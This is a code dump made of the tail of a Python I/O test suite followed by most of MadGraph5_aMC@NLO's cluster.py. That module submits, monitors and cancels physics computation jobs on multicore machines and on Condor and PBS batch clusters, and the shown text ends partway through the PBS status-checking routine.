CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
cluster.py
|
################################################################################
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
################################################################################
from __future__ import absolute_import
from __future__ import print_function
import subprocess
import logging
import os
import time
import re
import glob
import inspect
import sys
import six
from six.moves import range
from six.moves import input
logger = logging.getLogger('madgraph.cluster')
try:
from madgraph import MadGraph5Error
import madgraph.various.misc as misc
except Exception as error:
if __debug__:
print(str(error))
from internal import MadGraph5Error
import internal.misc as misc
pjoin = os.path.join
class ClusterManagmentError(MadGraph5Error):
pass
class NotImplemented(MadGraph5Error):
pass
multiple_try = misc.multiple_try
pjoin = os.path.join
def check_interupt(error=KeyboardInterrupt):
def deco_interupt(f):
def deco_f_interupt(self, *args, **opt):
try:
return f(self, *args, **opt)
except error:
try:
self.remove(*args, **opt)
except Exception:
pass
raise error
return deco_f_interupt
return deco_interupt
def store_input(arg=''):
def deco_store(f):
def deco_f_store(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
input_files=[], output_files=[], required_output=[], nb_submit=0):
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
args = dict([(i, values[i]) for i in args if i != 'self'])
id = f(self, **args)
if self.nb_retry > 0:
self.retry_args[id] = args
return id
return deco_f_store
return deco_store
def need_transfer(options):
""" This function checks whether compression of input files are necessary
given the running options given. """
if options['run_mode'] != 1 and options['cluster_temp_path'] is None:
return False
else:
return True
class Cluster(object):
"""Basic Class for all cluster type submission"""
name = 'mother class'
identifier_length = 14
def __init__(self,*args, **opts):
"""Init the cluster"""
self.submitted = 0
self.submitted_ids = []
self.finish = 0
self.submitted_dirs = [] #HTCaaS
self.submitted_exes = [] #HTCaaS
self.submitted_args = [] #HTCaaS
if 'cluster_queue' in opts:
self.cluster_queue = opts['cluster_queue']
else:
self.cluster_queue = 'madgraph'
if 'cluster_temp_path' in opts:
self.temp_dir = opts['cluster_temp_path']
else:
self.temp_dir = None
self.options = {'cluster_status_update': (600, 30)}
for key,value in opts.items():
self.options[key] = value
self.nb_retry = opts['cluster_nb_retry'] if 'cluster_nb_retry' in opts else 0
self.cluster_retry_wait = float(opts['cluster_retry_wait']) if 'cluster_retry_wait' in opts else 300
self.options = dict(opts)
self.retry_args = {}
# controlling jobs in controlled type submision
self.packet = {}
self.id_to_packet = {}
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""How to make one submission. Return status id on the cluster."""
raise NotImplemented('No implementation of how to submit a job to cluster \'%s\'' % self.name)
@store_input()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""How to make one submission. Return status id on the cluster.
NO SHARE DISK"""
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if not required_output and output_files:
required_output = output_files
if not hasattr(self, 'temp_dir') or not self.temp_dir or \
(input_files == [] == output_files):
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
if not input_files and not output_files:
# not input/output so not using submit2
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
temp_file_name = "sub." + os.path.basename(prog) + '.'.join(argument)
text = """#!/bin/bash
MYTMP=%(tmpdir)s/run$%(job_id)s
MYPWD=%(cwd)s
mkdir -p $MYTMP
cd $MYPWD
input_files=( %(input_files)s )
for i in ${input_files[@]}
do
cp -R -L $i $MYTMP
done
cd $MYTMP
echo '%(arguments)s' > arguments
chmod +x ./%(script)s
%(program)s ./%(script)s %(arguments)s
exit=$?
output_files=( %(output_files)s )
for i in ${output_files[@]}
do
cp -r $MYTMP/$i $MYPWD
done
# if [ "$exit" -eq "0" ]
# then
rm -rf $MYTMP
# fi
"""
dico = {'tmpdir' : self.temp_dir, 'script': os.path.basename(prog),
'cwd': cwd, 'job_id': self.job_id,
'input_files': ' '.join(input_files + [prog]),
'output_files': ' '.join(output_files),
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
return self.submit(new_prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
def cluster_submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0, packet_member=None):
"""This function wrap the cluster submition with cluster independant
method should not be overwritten (but for DAG type submission)"""
id = self.submit2(prog, argument, cwd, stdout, stderr, log, input_files,
output_files, required_output, nb_submit)
if not packet_member:
return id
else:
if isinstance(packet_member, Packet):
self.id_to_packet[id] = packet_member
packet_member.put(id)
if packet_member.tag not in self.packet:
self.packet[packet_member.tag] = packet_member
else:
if packet_member in self.packet:
packet = self.packet[packet_member]
packet.put(id)
self.id_to_packet[id] = packet
return id
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
if not self.submitted_ids:
raise NotImplemented('No implementation of how to control the job status to cluster \'%s\'' % self.name)
idle, run, fail = 0, 0, 0
for pid in self.submitted_ids[:]:
status = self.control_one_job(id)
if status == 'I':
idle += 1
elif status == 'R':
run += 1
elif status == 'F':
self.finish +=1
self.submitted_ids.remove(pid)
else:
fail += 1
return idle, run, self.finish, fail
def control_one_job(self, pid):
""" control the status of a single job with it's cluster id """
raise NotImplemented('No implementation of how to control the job status to cluster \'%s\'' % self.name)
def get_jobs_identifier(self, path, second_path=None):
"""get a unique run_name for all the jobs helps to identify the runs
in the controller for some cluster."""
if second_path:
path = os.path.realpath(pjoin(path, second_path))
elif not os.path.exists(path):
return path # job already done
if 'SubProcesses' in path:
target = path.rsplit('/SubProcesses',1)[0]
elif 'MCatNLO' in path:
target = path.rsplit('/MCatNLO',1)[0]
elif 'PY8_parallelization' in path:
target = path.rsplit('/PY8_parallelization',1)[0]
elif second_path:
target=path
logger.warning("cluster.get_job_identifier runs unexpectedly. This should be fine but report this message if you have problem.")
else:
target = path
if target.endswith('/'):
target = target[:-1]
target = misc.digest(target.encode())[-self.identifier_length:]
if not target[0].isalpha():
target = 'a' + target[1:]
return target
@check_interupt()
def wait(self, me_dir, fct, minimal_job=0, update_first=None):
"""Wait that all job are finish.
if minimal_job set, then return if idle + run is lower than that number"""
mode = 1 # 0 is long waiting/ 1 is short waiting
nb_iter = 0
nb_short = 0
change_at = 5 # number of iteration from which we wait longer between update.
if update_first:
idle, run, finish, fail = self.control(me_dir)
update_first(idle, run, finish)
#usefull shortcut for readibility
longtime, shorttime = self.options['cluster_status_update']
nb_job = 0
if self.options['cluster_type'] == 'htcaas2':
me_dir = self.metasubmit(self)
while 1:
old_mode = mode
nb_iter += 1
idle, run, finish, fail = self.control(me_dir)
if nb_job:
if idle + run + finish + fail != nb_job:
nb_job = idle + run + finish + fail
nb_iter = 1 # since some packet finish prevent to pass in long waiting mode
else:
nb_job = idle + run + finish + fail
if fail:
raise ClusterManagmentError('Some Jobs are in a Hold/... state. Please try to investigate or contact the IT team')
if idle + run == 0:
#time.sleep(20) #security to ensure that the file are really written on the disk
logger.info('All jobs finished')
fct(idle, run, finish)
break
if idle + run < minimal_job:
return
fct(idle, run, finish)
#Determine how much we have to wait (mode=0->long time, mode=1->short time)
if nb_iter < change_at:
mode = 1
elif idle < run:
if old_mode == 0:
if nb_short:
mode = 0 #we already be back from short to long so stay in long
#check if we need to go back to short mode
elif idle:
if nb_iter > change_at + int(longtime)//shorttime:
mode = 0 #stay in long waiting mode
else:
mode = 1 # pass in short waiting mode
nb_short =0
else:
mode = 1 # pass in short waiting mode
nb_short = 0
elif old_mode == 1:
nb_short +=1
if nb_short > 3* max(change_at, int(longtime)//shorttime):
mode = 0 #go back in slow waiting
else:
mode = 0
#if pass from fast(mode=1) to slow(mode=0) make a print statement:
if old_mode > mode:
logger.info('''Start to wait %ss between checking status.
Note that you can change this time in the configuration file.
Press ctrl-C to force the update.''' % self.options['cluster_status_update'][0])
#now Waiting!
if mode == 0:
try:
time.sleep(self.options['cluster_status_update'][0])
except KeyboardInterrupt:
logger.info('start to update the status')
nb_iter = min(0, change_at -2)
nb_short = 0
else:
time.sleep(self.options['cluster_status_update'][1])
self.submitted = 0
self.submitted_ids = []
self.id_to_packet = {}
def check_termination(self, job_id):
"""Check the termination of the jobs with job_id and relaunch it if needed."""
if job_id not in self.retry_args:
if job_id in self.id_to_packet:
nb_in_packet = self.id_to_packet[job_id].remove_one()
if nb_in_packet == 0:
# packet done run the associate function
packet = self.id_to_packet[job_id]
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
#running the function
packet.fct(*packet.args)
del self.id_to_packet[job_id]
return 'resubmit'
else:
return True
args = self.retry_args[job_id]
if 'time_check' in args:
time_check = args['time_check']
else:
time_check = 0
for path in args['required_output']:
if args['cwd']:
path = pjoin(args['cwd'], path)
# check that file exists and is not empty.
if not (os.path.exists(path) and os.stat(path).st_size != 0) :
break
else:
# all requested output are present
if time_check > 0:
logger.info('Job %s Finally found the missing output.' % (job_id))
del self.retry_args[job_id]
self.submitted_ids.remove(job_id)
# check if the job_id is in a packet
if job_id in self.id_to_packet:
nb_in_packet = self.id_to_packet[job_id].remove_one()
if nb_in_packet == 0:
# packet done run the associate function
packet = self.id_to_packet[job_id]
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
#running the function
packet.fct(*packet.args)
del self.id_to_packet[job_id]
return 'resubmit'
return 'done'
if time_check == 0:
logger.debug('''Job %s: missing output:%s''' % (job_id,path))
args['time_check'] = time.time()
return 'wait'
elif self.cluster_retry_wait > time.time() - time_check:
return 'wait'
#jobs failed to be completed even after waiting time!!
if self.nb_retry < 0:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s''' % (job_id, args, path))
input('press enter to continue.')
elif self.nb_retry == 0:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s.
Stopping all runs.''' % (job_id, args, path))
self.remove()
elif args['nb_submit'] >= self.nb_retry:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s
Fails %s times
No resubmition. ''' % (job_id, args, path, args['nb_submit']))
self.remove()
else:
args['nb_submit'] += 1
logger.warning('resubmit job (for the %s times)' % args['nb_submit'])
del self.retry_args[job_id]
self.submitted_ids.remove(job_id)
if 'time_check' in args:
del args['time_check']
if job_id in self.id_to_packet:
self.id_to_packet[job_id].remove_one()
args['packet_member'] = self.id_to_packet[job_id]
del self.id_to_packet[job_id]
self.cluster_submit(**args)
else:
self.submit2(**args)
return 'resubmit'
return 'done'
@check_interupt()
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, required_output=[], nb_submit=0,
input_files=[], output_files=[]):
"""launch one job on the cluster and wait for it"""
special_output = False # tag for concatenate the error with the output.
if stderr == -2 and stdout:
#We are suppose to send the output to stdout
special_output = True
stderr = stdout + '.err'
id = self.submit2(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, input_files=input_files,
output_files=output_files)
if self.options['cluster_type']=='htcaas2':
if self.submitted == self.submitted_ids[-1]:
id = self.metasubmit(self)
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
args = dict([(i, values[i]) for i in args if i != 'self'])
self.retry_args[id] = args
nb_wait=0
while 1:
nb_wait+=1
status = self.control_one_job(id)
if not status in ['R','I']:
status = self.check_termination(id)
if status in ['wait']:
time.sleep(30)
continue
elif status in ['resubmit']:
id = self.submitted_ids[0]
time.sleep(30)
continue
#really stop!
time.sleep(30) #security to ensure that the file are really written on the disk
break
time.sleep(self.options['cluster_status_update'][1])
if required_output:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
if special_output:
# combine the stdout and the stderr
#wait up to 50 s to see if those files exists
for i in range(5):
if os.path.exists(stdout):
if not os.path.exists(stderr):
time.sleep(5)
if os.path.exists(stderr):
err_text = open(stderr).read()
if not err_text:
return
logger.warning(err_text)
text = open(stdout).read()
open(stdout,'w').write(text + err_text)
else:
return
time.sleep(10)
def remove(self, *args, **opts):
""" """
logger.warning("""This cluster didn't support job removal,
the jobs are still running on the cluster.""")
@store_input()
def metasubmit(self, me_dir):
logger.warning("""This cluster didn't support metajob submit.""")
return 0
def modify_interface(self, run_interface):
"""routine which allow to modify the run_card/mg5cmd object to change the
default behavior of the runs.
This is called at the time of the compilation of the run_card.
Note that this function can be called multiple times by run.
"""
#run_card = run_interface.run_card
return
class Packet(object):
""" an object for handling packet of job, it is designed to be thread safe
"""
def __init__(self, name, fct, args, opts={}):
import six.moves.queue
import threading
self.queue = six.moves.queue.Queue()
self.tag = name
self.fct = fct
self.args = args
self.opts = opts
self.done = threading.Event()
def put(self, *args, **opts):
self.queue.put(*args, **opts)
append = put
def remove_one(self):
self.queue.get(True)
self.queue.task_done()
return self.queue.qsize()
class MultiCore(Cluster):
"""class for dealing with the submission in multiple node"""
job_id = "$"
def __init__(self, *args, **opt):
"""Init the cluster """
super(MultiCore, self).__init__(self, *args, **opt)
import six.moves.queue
import threading
import six.moves._thread
self.queue = six.moves.queue.Queue() # list of job to do
self.done = six.moves.queue.Queue() # list of job finisned
self.submitted = six.moves.queue.Queue() # one entry by job submitted
self.stoprequest = threading.Event() #flag to ensure everything to close
self.demons = []
self.nb_done =0
if 'nb_core' in opt:
self.nb_core = opt['nb_core']
elif isinstance(args[0],int):
self.nb_core = args[0]
else:
self.nb_core = 1
self.update_fct = None
self.lock = threading.Event() # allow nice lock of the main thread
self.pids = six.moves.queue.Queue() # allow to clean jobs submit via subprocess
self.done_pid = [] # list of job finisned
self.done_pid_queue = six.moves.queue.Queue()
self.fail_msg = None
# starting the worker node
for _ in range(self.nb_core):
self.start_demon()
def start_demon(self):
import threading
t = threading.Thread(target=self.worker)
t.daemon = True
t.start()
self.demons.append(t)
def worker(self):
import six.moves.queue
import six.moves._thread
while not self.stoprequest.isSet():
try:
args = self.queue.get()
tag, exe, arg, opt = args
try:
# check for executable case
if isinstance(exe,str):
if os.path.exists(exe) and not exe.startswith('/'):
exe = './' + exe
if isinstance(opt['stdout'],str):
opt['stdout'] = open(opt['stdout'],'w')
if opt['stderr'] == None:
opt['stderr'] = subprocess.STDOUT
if arg:
proc = misc.Popen([exe] + arg, **opt)
else:
proc = misc.Popen(exe, **opt)
pid = proc.pid
self.pids.put(pid)
proc.wait()
if proc.returncode not in [0, 143, -15] and not self.stoprequest.isSet():
fail_msg = 'program %s launch ends with non zero status: %s. Stop all computation' % \
(' '.join([exe]+arg), proc.returncode)
logger.warning(fail_msg)
self.stoprequest.set()
self.remove(fail_msg)
# handle the case when this is a python function. Note that
# this use Thread so they are NO built-in parralelization this is
# going to work on a single core! (but this is fine for IO intensive
# function. for CPU intensive fct this will slow down the computation
else:
pid = tag
self.pids.put(pid)
# the function should return 0 if everything is fine
# the error message otherwise
returncode = exe(*arg, **opt)
if returncode != 0:
logger.warning("fct %s does not return 0. Stopping the code in a clean way. The error was:\n%s", exe, returncode)
self.stoprequest.set()
self.remove("fct %s does not return 0:\n %s" % (exe, returncode))
except Exception as error:
self.fail_msg = sys.exc_info()
logger.warning(str(error))
self.stoprequest.set()
self.remove(error)
if __debug__:
six.reraise(self.fail_msg[0], self.fail_msg[1], self.fail_msg[2])
self.queue.task_done()
self.done.put(tag)
self.done_pid_queue.put(pid)
#release the mother to print the status on the screen
try:
self.lock.set()
except six.moves._thread.error:
continue
except six.moves.queue.Empty:
continue
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""submit a job on multicore machine"""
tag = (prog, tuple(argument), cwd, nb_submit)
if isinstance(prog, str):
opt = {'cwd': cwd,
'stdout':stdout,
'stderr': stderr}
self.queue.put((tag, prog, argument, opt))
self.submitted.put(1)
return tag
else:
# python function
self.queue.put((tag, prog, argument, {}))
self.submitted.put(1)
return tag
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, **opts):
"""launch one job and wait for it"""
if isinstance(stdout, str):
stdout = open(stdout, 'w')
if isinstance(stderr, str):
stdout = open(stderr, 'w')
return misc.call([prog] + argument, stdout=stdout, stderr=stderr, cwd=cwd)
def remove(self, error=None):
"""Ensure that all thread are killed"""
# ensure the worker to stop
self.stoprequest.set()
if error and not self.fail_msg:
self.fail_msg = error
# cleaning the queue done_pid_queue and move them to done_pid
while not self.done_pid_queue.empty():
pid = self.done_pid_queue.get()
self.done_pid.append(pid)
# self.done_pid_queue.task_done()
while not self.pids.empty():
pid = self.pids.get()
self.pids.task_done()
if isinstance(pid, tuple):
continue
if pid in self.done_pid:
continue
out = os.system('CPIDS=$(pgrep -P %(pid)s); kill -15 $CPIDS > /dev/null 2>&1' \
% {'pid':pid} )
out = os.system('kill -15 %(pid)s > /dev/null 2>&1' % {'pid':pid} )
def wait(self, me_dir, update_status, update_first=None):
"""Waiting that all the jobs are done. This function also control that
the submission by packet are handle correctly (i.e. submit the function)"""
import six.moves.queue
import threading
try: # to catch KeyBoardInterupt to see which kind of error to display
last_status = (0, 0, 0)
sleep_time = 1
use_lock = True
first = True
while True:
force_one_more_loop = False # some security
# Loop over the job tagged as done to check if some packet of jobs
# are finished in case, put the associate function in the queue
while self.done.qsize():
try:
tag = self.done.get(True, 1)
except six.moves.queue.Empty:
pass
else:
if self.id_to_packet and tuple(tag) in self.id_to_packet:
packet = self.id_to_packet[tuple(tag)]
remaining = packet.remove_one()
if remaining == 0:
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
self.submit(packet.fct, packet.args)
force_one_more_loop = True
self.nb_done += 1
self.done.task_done()
# Get from the various queue the Idle/Done/Running information
# Those variable should be thread safe but approximate.
Idle = self.queue.qsize()
Done = self.nb_done + self.done.qsize()
Running = max(0, self.submitted.qsize() - Idle - Done)
if Idle + Running <= 0 and not force_one_more_loop:
update_status(Idle, Running, Done)
# Going the quit since everything is done
# Fully Ensure that everything is indeed done.
self.queue.join()
break
if (Idle, Running, Done) != last_status:
if first and update_first:
update_first(Idle, Running, Done)
first = False
else:
update_status(Idle, Running, Done)
last_status = (Idle, Running, Done)
# cleaning the queue done_pid_queue and move them to done_pid
while not self.done_pid_queue.empty():
pid = self.done_pid_queue.get()
self.done_pid.append(pid)
self.done_pid_queue.task_done()
# Define how to wait for the next iteration
if use_lock:
# simply wait that a worker release the lock
use_lock = self.lock.wait(300)
self.lock.clear()
if not use_lock and Idle > 0:
use_lock = True
else:
# to be sure that we will never fully lock at the end pass to
# a simple time.sleep()
time.sleep(sleep_time)
sleep_time = min(sleep_time + 2, 180)
if update_first:
update_first(Idle, Running, Done)
if self.stoprequest.isSet():
if isinstance(self.fail_msg, Exception):
raise self.fail_msg
elif isinstance(self.fail_msg, str):
raise Exception(self.fail_msg)
else:
misc.sprint(self.fail_msg)
six.reraise(self.fail_msg[0], self.fail_msg[1], self.fail_msg[2])
# reset variable for next submission
try:
self.lock.clear()
except Exception:
pass
self.done = six.moves.queue.Queue()
self.done_pid = []
self.done_pid_queue = six.moves.queue.Queue()
self.nb_done = 0
self.submitted = six.moves.queue.Queue()
self.pids = six.moves.queue.Queue()
self.stoprequest.clear()
self.id_to_packet = {}
except KeyboardInterrupt:
# if one of the node fails -> return that error
if isinstance(self.fail_msg, Exception):
raise self.fail_msg
elif isinstance(self.fail_msg, str):
raise Exception(self.fail_msg)
elif self.fail_msg:
six.reraise(self.fail_msg[0], self.fail_msg[1], self.fail_msg[2])
# else return orignal error
raise
class CondorCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'condor'
job_id = 'CONDOR_ID'
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a Condor cluster"""
text = """Executable = %(prog)s
output = %(stdout)s
error = %(stderr)s
log = %(log)s
%(argument)s
environment = CONDOR_ID=$(Cluster).$(Process)
Universe = vanilla
notification = Error
Initialdir = %(cwd)s
%(requirement)s
getenv=True
queue 1
"""
if self.cluster_queue not in ['None', None]:
requirement = 'Requirements = %s=?=True' % self.cluster_queue
else:
requirement = ''
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
if log is None:
log = '/dev/null'
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if argument:
argument = 'Arguments = %s' % ' '.join(argument)
else:
argument = ''
dico = {'prog': prog, 'cwd': cwd, 'stdout': stdout,
'stderr': stderr,'log': log,'argument': argument,
'requirement': requirement}
#open('submit_condor','w').write(text % dico)
a = misc.Popen(['condor_submit'], stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
output, _ = a.communicate((text % dico).encode())
#output = a.stdout.read()
#Submitting job(s).
#Logging submit event(s).
#1 job(s) submitted to cluster 2253622.
pat = re.compile("submitted to cluster (\d*)",re.MULTILINE)
output = output.decode(errors='ignore')
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the job on the cluster NO SHARE DISK
input/output file should be give relative to cwd
"""
if not required_output and output_files:
required_output = output_files
if (input_files == [] == output_files):
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
text = """Executable = %(prog)s
output = %(stdout)s
error = %(stderr)s
log = %(log)s
%(argument)s
should_transfer_files = YES
when_to_transfer_output = ON_EXIT
transfer_input_files = %(input_files)s
%(output_files)s
Universe = vanilla
notification = Error
Initialdir = %(cwd)s
%(requirement)s
getenv=True
queue 1
"""
if self.cluster_queue not in ['None', None]:
requirement = 'Requirements = %s=?=True' % self.cluster_queue
else:
requirement = ''
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
if log is None:
log = '/dev/null'
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if argument:
argument = 'Arguments = %s' % ' '.join([str(a) for a in argument])
else:
argument = ''
# input/output file treatment
if input_files:
input_files = ','.join(input_files)
else:
input_files = ''
if output_files:
output_files = 'transfer_output_files = %s' % ','.join(output_files)
else:
output_files = ''
dico = {'prog': prog, 'cwd': cwd, 'stdout': stdout,
'stderr': stderr,'log': log,'argument': argument,
'requirement': requirement, 'input_files':input_files,
'output_files':output_files}
#open('submit_condor','w').write(text % dico)
a = subprocess.Popen(['condor_submit'], stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
output, _ = a.communicate((text % dico).encode())
#output = a.stdout.read()
#Submitting job(s).
#Logging submit event(s).
#1 job(s) submitted to cluster 2253622.
output = output.decode(errors='ignore')
pat = re.compile("submitted to cluster (\d*)",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try(nb_try=10, sleep=10)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'condor_q '+str(id)+" -format \'%-2s \\n\' \'ifThenElse(JobStatus==0,\"U\",ifThenElse(JobStatus==1,\"I\",ifThenElse(JobStatus==2,\"R\",ifThenElse(JobStatus==3,\"X\",ifThenElse(JobStatus==4,\"C\",ifThenElse(JobStatus==5,\"H\",ifThenElse(JobStatus==6,\"E\",string(JobStatus))))))))\'"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read().decode(errors='ignore')
if status.returncode or error:
raise ClusterManagmentError('condor_q returns error: %s' % error)
return status.stdout.readline().decode(errors='ignore').strip()
jobstatus = {'0':'U', '1':'I','2':'R','3':'X','4':'C','5':'H','6':'E'}
@check_interupt()
@multiple_try(nb_try=10, sleep=10)
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
return 0, 0, 0, 0
packet = 15000
idle, run, fail = 0, 0, 0
ongoing = []
for i in range(1+(len(self.submitted_ids)-1)//packet):
start = i * packet
stop = (i+1) * packet
cmd = "condor_q " + ' '.join(self.submitted_ids[start:stop]) + \
" -format \"%d \" ClusterId " + \
" -format \"%d\\n\" JobStatus "
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read().decode(errors='ignore')
if status.returncode or error:
raise ClusterManagmentError('condor_q returns error: %s' % error)
for line in status.stdout:
id, status = line.decode(errors='ignore').strip().split()
status = self.jobstatus[status]
ongoing.append(id)
if status in ['I','U']:
idle += 1
elif status == 'R':
run += 1
elif status != 'C':
fail += 1
for id in list(self.submitted_ids):
if id not in ongoing:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
cmd = "condor_rm %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class PBSCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'pbs'
job_id = 'PBS_JOBID'
idle_tag = ['Q']
running_tag = ['T','E','R']
complete_tag = ['C']
maximum_submited_jobs = 2500
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a PBS cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if len(self.submitted_ids) > self.maximum_submited_jobs:
fct = lambda idle, run, finish: logger.info('Waiting for free slot: %s %s %s' % (idle, run, finish))
self.wait(me_dir, fct, self.maximum_submited_jobs)
text = ""
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s;" % cwd
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
if not os.path.isabs(prog):
text += "./%s" % prog
else:
text+= prog
if argument:
text += ' ' + ' '.join(argument)
command = ['qsub','-o', stdout,
'-N', me_dir,
'-e', stderr,
'-V']
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text.encode())[0].decode(errors='ignore')
id = output.split('.')[0]
if not id.isdigit() or a.returncode !=0:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'qstat '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
for line in status.stdout:
line = line.decode(errors='ignore').strip()
if 'cannot connect to server' in line or 'cannot read reply' in line:
raise ClusterManagmentError('server disconnected')
if 'Unknown' in line:
return 'F'
elif line.startswith(str(id)):
jobstatus = line.split()[4]
else:
jobstatus=""
if status.returncode != 0 and status.returncode is not None:
raise ClusterManagmentError('server fails in someway (errorcode %s)' % status.returncode)
if jobstatus in self.idle_tag:
return 'I'
elif jobstatus in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "qstat"
status = misc.Popen([cmd], stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
ongoing = []
idle, run, fail = 0, 0, 0
for line in status.stdout:
line = line.decode(errors='ignore')
if 'cannot connect to server' in line or 'cannot read reply' in line:
raise ClusterManagmentError('server disconnected')
if me_dir in line:
ongoing.append(line.split()[0].split('.')[0])
status2 = line.split()[4]
if status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
